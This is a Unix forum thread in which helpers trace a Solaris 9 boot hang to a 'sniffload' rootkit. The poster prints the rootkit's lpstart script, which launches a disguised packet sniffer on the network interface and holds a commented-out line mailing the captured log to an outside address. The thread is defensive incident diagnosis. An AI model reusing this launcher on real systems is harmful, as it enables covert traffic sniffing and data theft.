nfsd won't start at boot up

Hi

Inexplicably, nfsd no longer starts automatically on our Sun boxes running Solaris 9, so that 'automount' no longer functions automatically. The problem first manifested itself when we could not access files on any of the nfs automounted directories in our LAN after one of the servers (say server A) was rebooted. Attempts to 'cd' to any of the directories on server B served up by server A were met with a 'permission denied'. 'ps - ef | grep nfsd' revealed that 'nfsd' was not running. Meanwhile 'automount' was issueing the message: 'server A not responding' though we could 'ping' server A just fine. We then rebooted server B, and its 'nfsd' too failed to start at boot up, leading to the same 'automount' problem on server A. Starting 'nfsd' manually on both systems fixes the 'automount' problem on both. Perhaps because of whatever caused this behavior, we are no longer able to access these servers using 'SSH' or 'sftp'. Regular non-secure 'ftp' works, but only within the LAN (we are behind an institution-wide firewall). This behavior just came out of the blue, as up until this week these servers have behaved extremely well and reliably for a few years, in providing all kinds of services and resources. Please help!

When was the last change to the nfs startup scripts and inittab? To find out, use
ls -ld /etc/init.d /etc/init.d/nfs.server
ls -ld /etc/rc3.d /etc/rc3.d/*nfs.server
ls -l /etc/inittab

When nfsd is not running, does "/etc/init.d/nfs.server start" restart it? Is the box in run level 3? Use "who -r" to verify. If not, what does: "grep initdefault /etc/inittab" say?

UNIX Daemon:

Thank you for replying. The change to nfs start up script was on Fri 3/11, when I added 'set -x' at the very top, then I rebooted the system.

nmr% ls -ld /etc/init.d/nfs.server
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/init.d/nfs.server*

nmr% ls -ld /etc/rc3.d /etc/rc3.d/*nfs.server

drw-r--r-- 2 root sys 512 Aug 20 2003 /etc/rc3.d/
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/init.d/nfs.server*

nmr% ls -l /etc/inittab
-rwxr--r-- 1 root sys 1081 Jun 14 2002 /etc/inittab

"/etc/init.d/nfs.server start" does start nfsd when it fails to start at boot up, and that is how we are able to regain 'mount' functionality... And the system appears to be in run level 3.

nmr% who -r
. run-level 3 Mar 11 15:34

Though my 'dfstab' is populated with several 'share....', the shareall command does not appear to be executed at boot up since 'sharetab' is empty after a reboot. Manually typing 'shareall' repopulates 'sharetab'...

Any thoughts?

Did you make a typo? I don't see a link to nfs.server in /etc/rc3.d in the output you posted. The existence of that link is crucial and its absence could explain why nfs is not being started.

UNIX Daemon:

I just did a cut and paste of the commands you suggested so that I can rule out typo, unless there was one in yout post. I see no link in rc3.d to nfs.server if there's supposed to be one:

nmr% ls -ld /etc/rc3.d /etc/rc3.d/nfs.server
drwxr-xr-x 2 root sys 512 Aug 20 2003 /etc/rc3.d/
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/rc3.d/S15nfs.server

explicity in rc3.d

nmr% ls -l /etc/rc3.d
total 48
-rw-r--r-- 1 root sys 1708 Apr 6 2002 README
-rwxr--r-- 6 root sys 2124 Apr 6 2002 S13kdc.master*
-rwxr--r-- 6 root sys 1239 Apr 6 2002 S14kdc*
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 S15nfs.server*
-rwxr--r-- 6 root sys 707 Apr 6 2002 S16boot.server*
-rwxr--r-- 6 root sys 621 Apr 6 2002 S34dhcp*
-rwxr--r-- 6 root sys 1496 Mar 2 2002 S50apache*
-rwxr--r-- 6 root sys 616 Apr 6 2002 S76snmpdx*
-rwxr--r-- 6 root sys 1056 Apr 6 2002 S77dmi*
-rwxr--r-- 6 root sys 344 Apr 6 2002 S80mipagent*
-rwxr--r-- 6 root sys 1508 Apr 6 2002 S89sshd*
lrwxrwxrwx 1 root other 19 Jan 7 2002 S90hpjfpmd -> /etc/init.d/hpjfpmd*
lrwxrwxrwx 1 root other 21 Jan 7 2002 S90hpwebjetd -> /etc/init.d/hpwebjetd*
-rwxr--r-- 6 root sys 324 Mar 2 2002 S90samba*
-rwxr-xr-x 5 root bin 461 Jan 31 2002 S99sunpci.server*
nmr%

If this link missing, what should it look like and how do I restore it? Why did it just disappear!?!?

Thanks

The link appears to be there. You apparently have ls aliased to add some extra options. So the starup scripts look good and I'm not sure what to tell you... :confused:

My bet would be that the nfs startup is hanging for some reason, especially since you don't get the ssh functionality, the script does not return so the startup sequence does not continue.

Have a look at the output from ptree and see if the /etc/rc3.d/S15nfs.server is still running, if so this is where the problem lies, as for the actual cause of it hanging, you might also get a clue from there, or maybe post that output.
If you do post, please be sure to remove any reference to your hostname/ipaddress from the post.

Here's the output from 'ptree'... Nothing looks out of the ordinary, though I am not sure I know what I am looking for...

nmr% ptree
54    /usr/lib/sysevent/syseventd
61    /usr/lib/picl/picld
62    /sbin/sh /sbin/rc2
  317   /bin/sh /usr/lib/lpstart
    320   /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l
114   /usr/lib/inet/in.ndpd
129   /usr/sbin/rpcbind
147   /usr/sbin/inetd -s
  411   rpc.ttdbserverd
  502   rpc.rstatd
  521   rpc.cmsd
  1397  in.telnetd
    1399  -csh
      1463  ptree
186   /usr/lib/nfs/statd
187   /usr/lib/nfs/lockd
192   /usr/lib/autofs/automountd
204   /usr/sbin/syslogd
207   /usr/sbin/cron
221   /usr/sbin/nscd
227   /usr/lib/lpsched
240   /usr/lib/power/powerd
250   /usr/lib/utmpd
262   /usr/sadm/lib/smc/bin/smcboot
  263   /usr/sadm/lib/smc/bin/smcboot
  265   /usr/sadm/lib/smc/bin/smcboot
276   /usr/lib/sendmail -bd -q15m
277   /usr/lib/sendmail -Ac -q15m
284   /usr/sbin/ifbdaemon /dev/fbs/ifb0
286   /usr/sbin/vold
291   /usr/lib/im/htt -port 9010 -syslog -message_locale C
  293   htt_server -port 9010 -syslog -message_locale C
316   /opt/idl_5.5/bin/bin.solaris2.sparc64/lmgrd -c /opt/license/license.dat
  322   /opt/idl_5.5/bin/bin.solaris2.sparc64/idl_lmgrd -T nmr 6.1 4 -c /opt/li
321   /usr/dt/bin/dtlogin -daemon
  333   /usr/openwin/bin/Xsun :0 -nobanner -dev /dev/fb1 defdepth 24 -auth /var
  335   /usr/dt/bin/dtlogin -daemon
    352   /bin/ksh /usr/dt/bin/Xsession
      362   /usr/openwin/bin/fbconsole
      397   /usr/dt/bin/sdt_shell -c unsetenv _ PWD;             unsetenv DT;
        399   csh -c unsetenv _ PWD;             unsetenv DT;      setenv DISPL
          410   /usr/dt/bin/dtsession
            417   dtwm
              636   /usr/dt/bin/dtexec -open 0 -ttprocid 2.12CW6f 01 409 128963
                637   xterm
                  638   csh
              693   /usr/dt/bin/dtexec -open 0 -ttprocid 2.12CW6f 01 409 128963
                694   xterm
                  695   csh
            418   dtfile -session dtKyaWYa
            419   /usr/dt/bin/dtprintinfo -session dtILaaZa -all -xrm *iconX:2
            420   /usr/dt/bin/dtprintinfo -session dtqJa4Ya -all -xrm *iconX:2
            421   /usr/dt/bin/dtprintinfo -session dthNaqZa -all -xrm *iconX:2
            422   /usr/dt/bin/dtprintinfo -session dtKNayZa -all -xrm *iconX:2
            425   /usr/dt/bin/dtterm -session dtIeaiZa -C -ls
              466   -csh
            426   /usr/dt/bin/dtmail -session dtbfaGZa
            427   /usr/dt/bin/dtcm -session dtJfaOZa -xrm *iconX:2 -xrm *iconY:
            428   /usr/dt/bin/dtterm -session dtYgaWdb
              467   /bin/csh
                667   vi genx.c
            429   /usr/dt/bin/sdtperfmeter -f -H -t cpu -t disk -s 1 -name fppe
            811   /usr/dt/bin/dtexec -open 0 -ttprocid 1.12CW6f 01 409 12896370
              812   /usr/dt/bin/dtscreen -mode hop
  336   /usr/openwin/bin/fbconsole -d :0
366   /usr/openwin/bin/speckeysd
400   /usr/dt/bin/dsdm
409   /usr/dt/bin/ttsession
437   /bin/ksh /usr/dt/bin/sdtvolcheck -d -z 5 cdrom,zip,jaz,dvdrom,rmdisk
  544   /bin/cat /tmp/.removable/notify437
583   /usr/lib/nfs/mountd
585   /usr/lib/nfs/nfsd
1118  ./bash an
1122  ./bash kit
nmr%

Sorry I wasn't very clear there, I meant when you reboot the machine, but one think I did spot there was:

62 /sbin/sh /sbin/rc2

That definitely shouldn't be there, looks like your sever isn't making it fully up to run level 3, and so /etc/rc3 and hence the contents of /etc/rc3.d never get run.

This also explains why your other "symptoms" occur.

You need to find out why this is happening, but if you need to get the server up and running normally, you could just kill pid 62 and ssh and all the rest should come up.

You might see something if you truss the rc2 script, maybe, maybe not
truss -wall -rall -f -o rc2.txt -p 62

Reborg:

I am sure that you are right that the system isn't making it all the way through level 3, as I have traced the other "symptoms" to missing "daemons"...

'ssh' and 'sftp' were not running because 'sshd', like 'nfsd', was not started at boot up. I just restarted 'sshd' manually, and now I can connect with both 'ssh' and 'sftp'.

You wrote:
"Sorry I wasn't very clear there, I meant when you reboot the machine,..."

I am still not sure what you mean? At what point do I run 'ptree' during reboot?

I will now 'truss' and report.

Thanks!

I just ran 'truss'

nmr% truss -wall -rall -f -o rc2.txt -p 62

The command never returned so I did a 'ctrl c' to end it. The output file rc2.txt was created and it contains a single line:

62: waitid(P_PID, 317, 0xFFBFFCC8, WEXITED|WTRAPPED|WNOWAIT) (sleeping...)

does it mean anything?

reborg is on to something here. Your truss output says rc2 is waiting for lpstart. After I fixed the formatting on your ptree display, that is now obvious. And lpstart is waiting for that lpset.

We don't have a lpstart on our Solaris 9 system. I'm not sure where yours comes from.

Hmmmm... lpstart... Let's see. We do have one in /usr/lib. It is a script and here is what it contains:

-----------------------------------------------------------------------

#!/bin/sh

set EMAIL_ADDRESS optix@dr-dre.com

#cp $SNFBIN /usr/lib/lpset
#cp sniffload /usr/lib/lpstart
touch /dev/prom/sn.l

#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null

echo "Restart on `date`" >>/dev/prom/sn.l

if test -f /dev/prom/dos ;then
cd /usr/lib
./lpq
fi

#nohup /usr/lib/lpset -s -o /dev/prom/sn.l >/dev/null &
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&

--------------------------------------------------------------------

I am going to run it and see what happens. Running it as root....

# lpstart
Sending output to nohup.out
^C#

Just had to do a 'ctrl C' as the script wouldn't return... That may be what's happening.

Now what exactly does 'lpstart' do. Is it native to Solaris or has it been installed by package that I installed? Those with a lot more sysadmin experience than me might be able to figure it out. Where is it being started from?

It seems that the puzzle's days are now numbered. Thanks!

I suspect that you have been hacked. dr-dre.com? That won't be from a Sun package! It kinda looks like it's being run from rc2 directly. To see if that's the case...
ls -l /sbin/rc2
grep lp /sbin/rc2

I don't have it in my rc2. If it's not there, try:
grep lpstart /etc/init.d/*

This is beginning to look like a break in. The email in the script 'optix@dr-dre.com' might be related to this website.

http://www.dr-dre.com/index.shtml

Then I just 'googled' this out

Sniffload

"Posted By Gustavo Colmenares On Sunday, September 01, 2002 at 5:31 PM

I have a Mailserver with Solaris 2.7 and recently it was hacked with a rootkit "sniffload." (sniffer)

This rootkit replaces versions of the filesystem files with troyan horses (ps, find, netstat for example) and to send information to an unknown address 128.0. something.

The files that it installs are lpq, lpset, lpstart in the directory usr/lib

Can somebody help me to return my system to the normality? What can I do to stop the attack?

Thank you for your help"

And I googled this... From this page:

Sure enough..

# grep lp /sbin/rc2
/usr/lib/lpstart
/usr/lib/lpstart
/usr/lib/lpstart
#

What do to now? Is there a way for me to find out which other binaries have been compromised?

Thanks for your help!

I see that you say "(we are behind an institution-wide firewall)". Do you institution-wide security people? Contact them. Now. Tonight. This attack has almost certainly spread past this one system. As for this system, I would completely re-install the operating system.

There is no way around the fact that we must rebuild our systems. Just in time to upgrade to Solaris 10. Just left our IT people a message, but my sense is that the damage won't be extensive since our IT explicitly tells people that they do not support UNIX boxes, so that most people have avoided getting them or have been migrating to supported platforms. Since I could not count on support from our IT, I had contacted Sun's tech support (@ $300/hr), but they could not figure out what was going on, so I looked for the answer online, which led me to the Unix Forums.

Is Solaris 10 stable? Does any one have experience with it yet?

Thanks for everything!

Thanks Peraderabo,

You picked that up nicely where I left off.

dcshungu, glad we were able to help. Now apart from a clean reinstall, don't forget to change the root paswords to all your machines after reinstall, and make sure user passwords are also changed. Also if you don't need to use them you should consider disabling telnet/rogin/rsh/rcp/rexec/ftp and using only the secure equivalents.

There may well be no support for unix desktops, but there may be unix servers elswhere in the network as mailservers etc. but even if this is not the case your IT people should at least be concerned about the security breach, whether it was internal or external.

For Solaris 10 you should start a new thread to ask about it since you are moving on to a new topic.